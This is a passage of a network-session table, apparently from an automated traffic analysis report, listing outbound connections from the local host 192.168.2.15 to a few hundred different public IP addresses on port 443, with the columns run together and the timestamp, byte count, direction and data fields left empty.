                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14080192.168.2.1545660126.183.217.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14081192.168.2.1550788137.68.33.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14082192.168.2.155467499.99.186.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14083192.168.2.155830676.141.51.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14084192.168.2.153769843.146.11.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14085192.168.2.1550978191.6.26.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14086192.168.2.155258059.158.162.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14087192.168.2.1543328115.252.86.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14088192.168.2.153284063.94.28.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14089192.168.2.15362345.148.197.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14090192.168.2.1559044141.95.157.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14091192.168.2.1549064209.107.11.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14092192.168.2.154450284.255.157.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14093192.168.2.1536372184.139.138.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14094192.168.2.1541340120.255.43.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14095192.168.2.1546014170.173.206.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14096192.168.2.1556456122.14.80.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14097192.168.2.1541924131.142.84.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14098192.168.2.1553384100.21.250.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14099192.168.2.155987291.98.240.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14100192.168.2.1559774169.104.7.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14101192.168.2.1554734188.149.215.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14102192.168.2.1552514158.58.209.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14103192.168.2.1551454154.16.23.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14104192.168.2.1536414180.31.51.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14105192.168.2.1536352177.29.208.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14106192.168.2.155141274.211.249.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14107192.168.2.154527074.31.84.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14108192.168.2.1548616145.148.80.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14109192.168.2.1556252211.80.227.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14110192.168.2.1551324121.76.239.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14111192.168.2.153437872.154.163.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14112192.168.2.1546146180.226.133.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14113192.168.2.1552814185.32.150.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14114192.168.2.1537054184.6.166.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14115192.168.2.1545716198.218.137.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14116192.168.2.1558392159.72.238.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14117192.168.2.1557232181.69.188.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14118192.168.2.1559562161.247.163.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14119192.168.2.15337722.224.58.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14120192.168.2.154044078.136.38.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14121192.168.2.1541132198.144.244.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14122192.168.2.1555832165.5.98.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14123192.168.2.1545430156.145.146.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14124192.168.2.1549170159.70.114.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14125192.168.2.154250093.153.122.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14126192.168.2.154671824.115.118.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14127192.168.2.1551238173.188.237.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14128192.168.2.1534300132.50.12.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14129192.168.2.1542224144.200.213.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14130192.168.2.1544610157.95.180.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14131192.168.2.1544668209.147.209.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14132192.168.2.1535494183.73.112.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14133192.168.2.1543172172.34.7.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14134192.168.2.1545762153.167.127.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14135192.168.2.154192024.233.107.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14136192.168.2.1546532118.103.117.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14137192.168.2.1560462217.15.1.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14138192.168.2.1551694134.196.59.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14139192.168.2.1545368186.198.46.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14140192.168.2.155519414.184.49.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14141192.168.2.1549186170.111.61.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14142192.168.2.153457013.165.176.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14143192.168.2.1542582159.93.187.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14144192.168.2.154746675.34.126.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14145192.168.2.155544458.36.179.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14146192.168.2.154761098.68.223.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14147192.168.2.153540664.88.86.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14148192.168.2.1556850117.233.179.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14149192.168.2.1544290178.140.18.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14150192.168.2.1552952198.140.223.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14151192.168.2.155635260.22.5.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14152192.168.2.154930840.84.230.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14153192.168.2.1539176218.214.52.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14154192.168.2.154875252.233.48.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14155192.168.2.1546710189.111.210.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14156192.168.2.154522696.21.70.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14157192.168.2.1535388173.3.34.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14158192.168.2.155148692.75.112.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14159192.168.2.155202459.129.215.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14160192.168.2.153977034.219.215.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14161192.168.2.155094877.40.91.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14162192.168.2.154006278.207.252.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14163192.168.2.155185041.219.119.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14164192.168.2.1555520184.187.211.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14165192.168.2.154078688.164.1.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14166192.168.2.153719631.235.198.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14167192.168.2.1550368190.250.102.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14168192.168.2.153988627.109.156.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14169192.168.2.153326834.157.223.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14170192.168.2.1553654201.117.243.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14171192.168.2.154268484.190.183.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14172192.168.2.1553550197.6.212.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14173192.168.2.1539012210.75.144.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14174192.168.2.1540020132.188.178.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14175192.168.2.1557504210.239.200.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14176192.168.2.1543236217.175.112.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14177192.168.2.1540584102.166.88.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14178192.168.2.154532852.213.157.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14179192.168.2.154168844.198.2.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14180192.168.2.154239873.228.114.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14181192.168.2.1549720135.168.55.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14182192.168.2.155330259.84.146.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14183192.168.2.1554428112.170.55.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14184192.168.2.155192035.247.71.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14185192.168.2.1546018201.101.34.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14186192.168.2.1534250129.243.217.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14187192.168.2.153726695.20.153.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14188192.168.2.1549574196.214.192.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14189192.168.2.1543092182.64.91.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14190192.168.2.1556562119.119.71.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14191192.168.2.1557942111.121.111.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14192192.168.2.155274481.10.162.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14193192.168.2.1550224121.215.67.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14194192.168.2.153400272.16.63.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14195192.168.2.15373028.122.249.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14196192.168.2.1542016162.188.16.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14197192.168.2.1537118191.117.183.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14198192.168.2.1553742193.54.32.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14199192.168.2.15442802.152.233.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14200192.168.2.1556834158.148.107.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14201192.168.2.154923241.172.238.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14202192.168.2.153811082.229.234.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14203192.168.2.1542200212.128.119.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14204192.168.2.154240461.165.120.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14205192.168.2.1539434175.17.20.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14206192.168.2.1540246139.162.38.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14207192.168.2.1543404162.122.1.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14208192.168.2.155535458.208.144.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14209192.168.2.1558924185.22.160.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14210192.168.2.1535604197.81.228.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14211192.168.2.1536766223.127.147.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14212192.168.2.1548942208.48.160.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14213192.168.2.15488681.233.151.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14214192.168.2.1534318116.245.38.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14215192.168.2.1535754221.116.118.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14216192.168.2.1547766132.239.87.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14217192.168.2.1546306174.133.223.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14218192.168.2.1547696199.137.164.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14219192.168.2.155589276.49.33.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14220192.168.2.15598649.226.60.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14221192.168.2.154798232.11.103.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14222192.168.2.155264041.176.139.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14223192.168.2.154872662.4.188.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14224192.168.2.1551294159.60.247.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14225192.168.2.15511225.152.65.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14226192.168.2.153863262.165.114.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14227192.168.2.1559900108.167.23.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14228192.168.2.1551496193.179.143.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14229192.168.2.1551940194.61.49.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14230192.168.2.15525165.176.182.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14231192.168.2.1540026137.137.235.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14232192.168.2.1558496183.215.244.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14233192.168.2.1539544209.195.9.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14234192.168.2.1553854185.72.39.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14235192.168.2.1534662177.135.83.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14236192.168.2.154838885.50.186.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14237192.168.2.153873260.238.8.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14238192.168.2.155864077.240.67.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14239192.168.2.153966071.209.111.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14240192.168.2.1535344142.184.214.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14241192.168.2.154638288.189.110.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14242192.168.2.153354280.172.207.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14243192.168.2.1535830138.5.39.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14244192.168.2.155943650.206.196.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14245192.168.2.1558548137.18.232.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14246192.168.2.1557274140.28.25.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14247192.168.2.1541604113.168.194.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14248192.168.2.15437984.50.113.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14249192.168.2.1537990131.175.77.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14250192.168.2.1546678175.3.70.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14251192.168.2.1540200187.77.210.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14252192.168.2.1558586185.170.172.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14253192.168.2.1557312114.155.167.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14254192.168.2.15517704.108.176.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14255192.168.2.1543478123.59.81.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14256192.168.2.154315274.16.208.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14257192.168.2.154239876.121.111.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14258192.168.2.1555572139.247.145.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14259192.168.2.1539260202.247.242.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14260192.168.2.1550094114.180.37.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14261192.168.2.1547982212.196.110.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14262192.168.2.154291438.205.118.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14263192.168.2.1557258168.80.29.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14264192.168.2.153396051.201.157.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14265192.168.2.1548144144.226.15.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14266192.168.2.1546542115.203.67.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14267192.168.2.1534056104.99.209.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14268192.168.2.153997413.243.41.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14269192.168.2.1545532157.118.108.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14270192.168.2.1543838174.148.9.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14271192.168.2.1554336102.161.254.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14272192.168.2.155579034.168.28.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14273192.168.2.1541040223.129.38.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14274192.168.2.154676697.146.46.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14275192.168.2.154745692.114.197.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14276192.168.2.1547222182.231.100.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14277192.168.2.154414287.66.143.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14278192.168.2.1543328134.142.12.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14279192.168.2.1546676208.252.31.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14280192.168.2.1542308223.94.191.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14281192.168.2.1541964149.23.129.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14282192.168.2.155800050.189.86.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14283192.168.2.154473495.173.39.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14284192.168.2.1542642146.128.83.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14285192.168.2.1558056218.214.26.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14286192.168.2.153883283.164.127.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14287192.168.2.1532870115.128.17.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14288192.168.2.1542006171.121.106.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14289192.168.2.1534048194.17.34.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14290192.168.2.1550156129.112.15.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14291192.168.2.1537956171.152.5.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14292192.168.2.154025698.21.153.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14293192.168.2.1537106161.69.61.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14294192.168.2.1538000128.4.21.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14295192.168.2.153811296.176.245.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14296192.168.2.1552398174.159.49.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14297192.168.2.1541652166.153.210.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14298192.168.2.1559752213.153.182.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14299192.168.2.156018448.97.38.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14300192.168.2.1558012113.224.78.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14301192.168.2.1555696175.194.204.185443
